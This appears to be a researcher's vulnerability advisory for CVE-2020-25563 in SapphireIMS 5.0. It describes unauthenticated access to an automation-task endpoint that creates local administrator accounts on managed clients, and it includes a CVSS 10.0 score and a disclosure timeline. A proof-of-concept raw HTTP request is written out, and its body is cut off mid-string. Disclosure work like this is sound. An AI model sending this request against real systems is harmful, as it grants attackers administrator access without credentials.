[CVE-2020-25563] SapphireIMS: Unauthenticated remote command execution (create local admin on clients)

Posted on

Description

In SapphireIMS 5.0, it is possible to create local administrator on any client without requiring any credentials by directly accessing RemoteMgmtTaskSave (Automation Tasks) feature and not having a JSESSIONID.

CVSS 3.0 Base Score

10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Researcher

Tanoy Bose

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /SapphireIMS/RemoteMgmtTaskSave?mainmenu=yes HTTP/1.1
Host: 192.168.191.48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1619
Origin: http://192.168.191.48
Connection: close
Referer: http://192.168.191.48/SapphireIMS/TaskConfiguration.jsp?jobTypeId=2017&TaskName=User%20Management&SubTaskName=User%20Account%20Creation&Taskid=1002&mainmenu=yes&SelectedSite=1
Upgrade-Insecure-Requests: 1

applicationLogoutTypeOldUI=0&nodupSite=1&mainMenuID=yes&WMIIndex=0&WMITabName=WMI&paramReq1=1&TabList=1&JobIDList=10005&IsparamRequired=1&JobID=10005&TabList=Scheduler&SNMPShowHosts=0&WMIShowHosts=1&WBEMShowHosts=0&SSHShowHosts=0&SelectedSite=1&SelectedTabList=1%2C10005%7C%26%26%7C&param_List=10005%2C1%240%2C1%241%7C%3D%

Vulnerability Tracker]

Disclosure timelines

  • 07 May, 2020 - Vendor informed; failed
  • 16 Sept, 2020 - Cert-CC and Cert-In Informed
Tanoy Bose
Namaste.
You can know about me at my portfolio.
I follow my own Vulnerability Disclosure Policy.
Most of my work is listed here.